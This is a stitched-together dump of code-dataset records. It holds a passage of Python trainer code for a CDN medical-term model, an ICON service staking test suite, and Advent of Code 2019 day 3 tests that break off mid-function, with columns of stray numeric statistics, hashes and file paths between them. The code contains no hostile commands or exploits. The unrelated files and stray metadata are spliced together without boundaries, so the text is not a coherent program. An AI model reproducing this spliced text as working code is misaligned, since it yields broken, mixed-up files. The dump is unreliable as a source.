if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
logits = outputs
if preds is None:
preds = logits.detach().softmax(-1)[:, 1].cpu().numpy()
else:
preds = np.append(preds, logits.detach().softmax(-1)[:, 1].cpu().numpy(), axis=0)
pbar(step, info="")
preds = preds.reshape(len(preds) // args.recall_k, args.recall_k)
np.save(os.path.join(args.result_output_dir, f'cdn_test_preds.npy'), preds)
return preds
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
torch.save(model.state_dict(), os.path.join(output_dir, 'pytorch_model.pt'))
self.logger.info('Saving models checkpoint to %s', output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model.encoder, self.tokenizer, self.ngram_dict, self.args)
else:
model.encoder.save_pretrained(output_dir)
self.tokenizer.save_vocabulary(save_directory=output_dir)
def _save_best_checkpoint(self, best_step):
pass
class CDNForNUMTrainer(Trainer):
def __init__(
self,
args,
model,
data_processor,
tokenizer,
logger,
model_class,
train_dataset=None,
eval_dataset=None,
ngram_dict=None
):
super(CDNForNUMTrainer, self).__init__(
args=args,
model=model,
data_processor=data_processor,
tokenizer=tokenizer,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
logger=logger,
model_class=model_class,
ngram_dict=ngram_dict
)
def training_step(self, model, item):
model.train()
text1 = item[0]
labels = item[1].to(self.args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
outputs = model(labels=labels, **inputs)
loss = outputs[0]
loss.backward()
return loss.detach()
def evaluate(self, model):
args = self.args
logger = self.logger
eval_dataloader = self.get_eval_dataloader()
num_examples = len(eval_dataloader.dataset)
preds = None
eval_labels = None
logger.info("***** Running evaluation *****")
logger.info("Num samples %d", num_examples)
for step, item in enumerate(eval_dataloader):
model.eval()
text1 = item[0]
labels = item[1].to(args.device)
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(labels=labels, **inputs)
loss, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
eval_labels = labels.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
eval_labels = np.append(eval_labels, labels.detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
p, r, f1, _ = cdn_num_metric(preds, eval_labels)
logger.info("%s-%s f1: %s", args.task_name, args.model_name, f1)
return f1
def predict(self, model, test_dataset, orig_texts, cls_preds, recall_labels, recall_scores):
args = self.args
logger = self.logger
test_dataloader = self.get_test_dataloader(test_dataset)
num_examples = len(test_dataloader.dataset)
model.to(args.device)
preds = None
logger.info("***** Running prediction *****")
logger.info("Num samples %d", num_examples)
pbar = ProgressBar(n_total=len(test_dataloader), desc='Evaluation')
for step, item in enumerate(test_dataloader):
model.eval()
text1 = item
if self.args.model_type == 'zen':
inputs = convert_examples_to_features(text1=text1, ngram_dict=self.ngram_dict,
tokenizer=self.tokenizer, max_seq_length=self.args.max_length,
return_tensors=True)
else:
inputs = self.tokenizer(text1, padding='max_length', max_length=self.args.max_length,
truncation=True, return_tensors='pt')
inputs['input_ids'] = inputs['input_ids'].to(self.args.device)
inputs['attention_mask'] = inputs['attention_mask'].to(self.args.device)
inputs['token_type_ids'] = inputs['token_type_ids'].to(self.args.device)
if self.args.model_type == 'zen':
inputs['input_ngram_ids'] = inputs['input_ngram_ids'].to(self.args.device)
inputs['ngram_position_matrix'] = inputs['ngram_position_matrix'].to(self.args.device)
inputs['ngram_attention_mask'] = inputs['ngram_attention_mask'].to(self.args.device)
inputs['ngram_token_type_ids'] = inputs['ngram_token_type_ids'].to(self.args.device)
with torch.no_grad():
outputs = model(**inputs)
if self.args.model_type == 'zen':
logits = outputs
else:
logits = outputs[0]
if preds is None:
preds = logits.detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
pbar(step, info="")
preds = np.argmax(preds, axis=1)
recall_labels = np.array(recall_labels['recall_label'])
recall_scores = recall_scores
cdn_commit_prediction(orig_texts, cls_preds, preds, recall_labels, recall_scores,
args.result_output_dir, self.data_processor.id2label)
def _save_checkpoint(self, model, step):
output_dir = os.path.join(self.args.output_dir, 'checkpoint-{}'.format(step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if self.args.model_type == 'zen':
save_zen_model(output_dir, model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(output_dir)
torch.save(self.args, os.path.join(output_dir, 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=output_dir)
self.logger.info('Saving models checkpoint to %s', output_dir)
def _save_best_checkpoint(self, best_step):
model = self.model_class.from_pretrained(os.path.join(self.args.output_dir, f'checkpoint-{best_step}'),
num_labels=self.data_processor.num_labels_num)
if not os.path.exists(os.path.join(self.args.output_dir, 'num')):
os.mkdir(os.path.join(self.args.output_dir, 'num'))
if self.args.model_type == 'zen':
save_zen_model(os.path.join(self.args.output_dir, 'num'), model=model, tokenizer=self.tokenizer,
ngram_dict=self.ngram_dict, args=self.args)
else:
model.save_pretrained(os.path.join(self.args.output_dir, 'num'))
torch.save(self.args, os.path.join(os.path.join(self.args.output_dir, 'num'), 'training_args.bin'))
self.tokenizer.save_vocabulary(save_directory=os.path.join(self.args.output_dir, 'num'))
self.logger.info('Saving models checkpoint to %s', os.path.join(self.args.output_dir, 'num'))
| 46.253
| 166
| 0.572578
| 11,072
| 96,345
| 4.705022
| 0.026824
| 0.071409
| 0.043959
| 0.070334
| 0.900718
| 0.8849
| 0.87369
| 0.863055
| 0.852766
| 0.841095
| 0
| 0.006385
| 0.322082
| 96,345
| 2,082
| 167
| 46.275216
| 0.791209
| 0.004775
| 0
| 0.838821
| 0
| 0
| 0.079482
| 0.009492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040439
| false
| 0.001733
| 0.006355
| 0.001155
| 0.070479
| 0.000578
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fba203c9a5649d703fa3d565aa12bfb8da0bdbb2
| 26,655
|
py
|
Python
|
tests/integrate_test/iiss/prevote/test_iiss_stake.py
|
bayeshack2016/icon-service
|
36cab484d2e41548d7f2f74526f127ee3a4423fc
|
[
"Apache-2.0"
] | 52
|
2018-08-24T02:28:43.000Z
|
2021-07-06T04:44:22.000Z
|
tests/integrate_test/iiss/prevote/test_iiss_stake.py
|
bayeshack2016/icon-service
|
36cab484d2e41548d7f2f74526f127ee3a4423fc
|
[
"Apache-2.0"
] | 62
|
2018-09-17T06:59:16.000Z
|
2021-12-15T06:02:51.000Z
|
tests/integrate_test/iiss/prevote/test_iiss_stake.py
|
bayeshack2016/icon-service
|
36cab484d2e41548d7f2f74526f127ee3a4423fc
|
[
"Apache-2.0"
] | 35
|
2018-09-14T02:42:10.000Z
|
2022-02-05T10:34:46.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""IconScoreEngine testcase
"""
from typing import TYPE_CHECKING, List
from unittest.mock import patch
from iconservice import SYSTEM_SCORE_ADDRESS
from iconservice.icon_constant import Revision, ICX_IN_LOOP
from tests.integrate_test.iiss.test_iiss_base import TestIISSBase
if TYPE_CHECKING:
from iconservice.iconscore.icon_score_result import TransactionResult
class TestIISSStake(TestIISSBase):
def test_full_stake(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# transfer 100 icx to self.addr_array[0]
balance: int = 100 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
# estimate
tx: dict = self.create_set_stake_tx(self._accounts[0], balance)
estimate_step: int = self.estimate_step(tx)
# set full stake
step_price: int = self.get_step_price()
estimate_fee: int = step_price * estimate_step
# set full stake
stake: int = balance
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake,
expected_status=False)
balance -= tx_results[0].step_used * tx_results[0].step_price
# set full stake - estimated_fee
stake: int = balance - estimate_fee
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
def test_iiss_stake(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 1000 icx
balance: int = 1000 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
# set stake 50 icx
stake: int = 50 * ICX_IN_LOOP
unstake: int = 0
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 100 icx
stake: int = 100 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake,
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 50 icx again
stake: int = 50 * ICX_IN_LOOP
unstake: int = 50 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
estimate_unstake_lock_period_response: dict = self.estimate_unstake_lock_period()
expected_response = {
"stake": stake,
"unstake": unstake
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
self.assertEqual(estimate_unstake_lock_period_response["unstakeLockPeriod"],
actual_response["remainingBlocks"])
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 100 icx again
stake: int = 100 * ICX_IN_LOOP
unstake: int = 0 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 50 icx again
stake: int = 50 * ICX_IN_LOOP
unstake: int = 50 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
estimate_unstake_lock_period_response: dict = self.estimate_unstake_lock_period()
expected_response = {
"stake": stake,
"unstake": unstake
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
self.assertEqual(estimate_unstake_lock_period_response["unstakeLockPeriod"],
actual_response["remainingBlocks"])
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 150 icx
stake: int = 150 * ICX_IN_LOOP
unstake: int = 0 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake
}
self.assertEqual(expected_response, actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 50 icx
stake: int = 50 * ICX_IN_LOOP
unstake: int = 100 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
estimate_unstake_lock_period_response: dict = self.estimate_unstake_lock_period()
expected_response = {
"stake": stake,
"unstake": unstake
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
self.assertEqual(estimate_unstake_lock_period_response["unstakeLockPeriod"],
actual_response["remainingBlocks"])
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# set stake 0 icx
stake: int = 0 * ICX_IN_LOOP
unstake: int = 150 * ICX_IN_LOOP
total_stake = stake + unstake
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
balance -= tx_results[0].step_used * tx_results[0].step_price
# get stake
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": stake,
"unstake": unstake,
}
self.assertEqual(expected_response['stake'], actual_response['stake'])
self.assertEqual(expected_response['unstake'], actual_response['unstake'])
self.assertIn('unstakeBlockHeight', actual_response)
# get balance
remain_balance: int = balance - total_stake
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
expired_block_height: int = actual_response['unstakeBlockHeight']
self.make_blocks(expired_block_height + 1)
# after unstake_lock_period
remain_balance: int = balance
actual_balance: int = self.get_balance(self._accounts[0])
self.assertEqual(remain_balance, actual_balance)
# update icx balance
# estimate
tx: dict = self.create_transfer_icx_tx(from_=self._accounts[0],
to_=self._admin,
value=0)
estimate_step: int = self.estimate_step(tx)
# set full stake
step_price: int = self.get_step_price()
estimate_fee: int = step_price * estimate_step
tx = self.create_transfer_icx_tx(self._accounts[0],
self._admin,
balance - estimate_fee,
step_limit=estimate_step)
self.process_confirm_block_tx([tx])
# get balance
actual_response: dict = self.get_stake(self._accounts[0])
expected_response = {
"stake": 0
}
self.assertEqual(expected_response, actual_response)
def test_unstake(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 10 icx
balance: int = 10 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
# set stake
stake: int = 8 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
# test scenario 1
total_stake: int = 8
for i in range(0, total_stake // 2):
# stake reset
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP)
# delegation
delegation_amount: int = (total_stake - i) * ICX_IN_LOOP
delegations: list = [(self._accounts[0], delegation_amount)]
self.set_delegation(from_=self._accounts[0],
origin_delegations=delegations)
# stake
self.set_stake(from_=self._accounts[0],
value=i * ICX_IN_LOOP,
expected_status=False)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
# test scenario 2
for i in range(total_stake // 2 + 1, total_stake + 1):
# stake reset
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP)
# delegation
delegation_amount: int = (total_stake - i) * ICX_IN_LOOP
delegations: list = [(self._accounts[0], delegation_amount)]
self.set_delegation(from_=self._accounts[0],
origin_delegations=delegations)
# stake
self.set_stake(from_=self._accounts[0],
value=i * ICX_IN_LOOP)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
# test scenario 3
# stake reset
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP)
# delegation
delegation_amount: int = total_stake * ICX_IN_LOOP - 1
delegations: list = [(self._accounts[0], delegation_amount)]
self.set_delegation(from_=self._accounts[0],
origin_delegations=delegations)
# unstake 1 loop
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP - 1)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
# Fail
# unstake 2 loop
self.set_stake(from_=self._accounts[0],
value=total_stake * ICX_IN_LOOP - 2,
expected_status=False)
response: dict = self.get_delegation(self._accounts[0])
voting_power: int = response['votingPower']
self.assertFalse(voting_power < 0)
@patch("iconservice.iconscore.icon_score_context.IconScoreContext.unstake_slot_max", 10)
def test_multiple_unstake(self):
# in integrate tests unstaking period is about 20 so that patch UNSTAKE_SLOT_MAX to 10
unstake_slot_max = 10
self.update_governance()
# set Revision REV_MULTIPLE_UNSTAKE
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# gain 1000 icx
balance: int = unstake_slot_max * 2 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1], init_balance=balance)
# set stake
stake: int = unstake_slot_max * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
# unstake 10
unstake_list = []
unstake = stake // unstake_slot_max // 2
for i in range(unstake_slot_max):
total_unstake = unstake * (i + 1)
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
unstake_list.append(unstake)
response: dict = self.get_stake(self._accounts[0])
for i in range(unstake_slot_max):
unstake_response = response["unstakes"][i]["unstake"]
self.assertEqual(unstake_list[i], unstake_response)
# increase unstake in last slot
total_unstake = sum(unstake_list) + ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
last_slot_block_height = response["unstakes"][unstake_slot_max-1]["unstakeBlockHeight"]
original_unstake = unstake_list.pop()
unstake_list.append(original_unstake + ICX_IN_LOOP)
last_slot_block_height2 = response["unstakes"][unstake_slot_max-1]["unstakeBlockHeight"]
for i in range(len(unstake_list)):
self.assertEqual(unstake_list[i], response["unstakes"][i]["unstake"])
# unstakeBlockHeight in last slot will be updated
self.assertGreaterEqual(last_slot_block_height2, last_slot_block_height)
# decrease slots
total_unstake = sum(unstake_list[:3])
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
response: dict = self.get_stake(self._accounts[0])
expected_unstakes = [unstake, unstake, unstake]
for i in range(len(expected_unstakes)):
self.assertEqual(expected_unstakes[i], response["unstakes"][i]["unstake"])
def test_migrate_unstake_data(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 1000 icx
balance: int = 1000 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1], init_balance=balance)
# set stake
stake: int = 100 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
# unstake 10
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
unstake_info = response
unstake_block_height = unstake_info["unstakeBlockHeight"]
# unstake 10 again and unstakeBlockHeight will be changed in rev IISS
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
unstake_info = response
unstake_block_height2 = unstake_info["unstakeBlockHeight"]
self.assertGreaterEqual(unstake_block_height2, unstake_block_height)
# set Revision REV_MULTIPLE_UNSTAKE
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake 10 again and unstakeBlockHeight will not be changed
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
unstake_info = response["unstakes"][0]
unstake_block_height3 = unstake_info["unstakeBlockHeight"]
self.assertEqual(unstake_block_height2, unstake_block_height3)
# unstake 20 to add more entry to unstake list
unstake = 20 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
response: dict = self.get_stake(self._accounts[0])
self.assertEqual(2, len(response['unstakes']))
for unstake_info in response["unstakes"]:
self.assertEqual(10 * ICX_IN_LOOP, unstake_info['unstake'])
def test_update_unstake_block_height(self):
self.update_governance()
# set Revision REV_IISS
self.set_revision(Revision.IISS.value)
# gain 1000 icx
balance: int = 1000 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1], init_balance=balance)
# set stake
stake: int = 100 * ICX_IN_LOOP
tx_results: List['TransactionResult'] = self.set_stake(from_=self._accounts[0],
value=stake)
fee = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - stake - fee
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
# unstake 10
unstake = 10 * ICX_IN_LOOP
total_unstake = unstake
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=stake-total_unstake)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
self.assertEqual(response["unstake"], unstake)
# set stake 120 icx and unstake info will be removed
new_stake = 120 * ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=new_stake)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2 - (new_stake - stake)
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
self.assertNotIn("unstakes", response)
# set Revision REV_MULTIPLE_UNSTAKE
self.set_revision(Revision.MULTIPLE_UNSTAKE.value)
# unstake 10
unstake = 10 * ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=new_stake-unstake)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
balance = expected_balance
response: dict = self.get_stake(self._accounts[0])
self.assertEqual(response["unstakes"][0]["unstake"], unstake)
# set stake 140 icx and unstake info will be removed
new_stake2 = 140 * ICX_IN_LOOP
tx_results: List["TransactionResult"] = self.set_stake(from_=self._accounts[0], value=new_stake2)
fee2 = tx_results[0].step_used * tx_results[0].step_price
expected_balance: int = balance - fee2 - (new_stake2 - new_stake)
response: int = self.get_balance(self._accounts[0])
self.assertEqual(expected_balance, response)
response: dict = self.get_stake(self._accounts[0])
self.assertNotIn("unstakes", response)
def test_stake_with_value_should_raise_exception(self):
self.update_governance()
self.set_revision(Revision.IISS.value)
balance: int = 10 * ICX_IN_LOOP
self.distribute_icx(accounts=self._accounts[:1],
init_balance=balance)
tx: dict = self.create_score_call_tx(from_=self._accounts[0],
to_=SYSTEM_SCORE_ADDRESS,
func_name='setStake',
params={"value": hex(8 * ICX_IN_LOOP)},
value=5)
return self.process_confirm_block_tx([tx], expected_status=False)
| 43.768473
| 118
| 0.624461
| 3,052
| 26,655
| 5.166448
| 0.073067
| 0.074581
| 0.075025
| 0.044394
| 0.829274
| 0.808346
| 0.785134
| 0.775178
| 0.768645
| 0.768138
| 0
| 0.018462
| 0.284712
| 26,655
| 608
| 119
| 43.840461
| 0.80856
| 0.078747
| 0
| 0.755924
| 0
| 0
| 0.046243
| 0.003026
| 0
| 0
| 0
| 0
| 0.14455
| 1
| 0.016588
| false
| 0
| 0.014218
| 0
| 0.035545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fba4276d22a96a19de78a0042951c4a04ac5f7ea
| 1,467
|
py
|
Python
|
AdventOfCode2019Day03/test/test_day03.py
|
bdlepla/AdventOfCode2019
|
27a8289bae8510f8af457658b2fa10d5345f9426
|
[
"Unlicense"
] | null | null | null |
AdventOfCode2019Day03/test/test_day03.py
|
bdlepla/AdventOfCode2019
|
27a8289bae8510f8af457658b2fa10d5345f9426
|
[
"Unlicense"
] | null | null | null |
AdventOfCode2019Day03/test/test_day03.py
|
bdlepla/AdventOfCode2019
|
27a8289bae8510f8af457658b2fa10d5345f9426
|
[
"Unlicense"
] | null | null | null |
def test_solve_part_1():
import day03
raw_lines = """
R8,U5,L5,D3
U7,R6,D4,L4
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_1()
expected = 6
assert expected == actual
def test_solve_part_1a():
import day03
raw_lines = """
R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51
U98,R91,D20,R16,D67,R40,U7,R15,U6,R7
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_1()
expected = 135
assert expected == actual
def test_solve_part_2():
import day03
raw_lines = """
R8,U5,L5,D3
U7,R6,D4,L4
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_2()
expected = 30
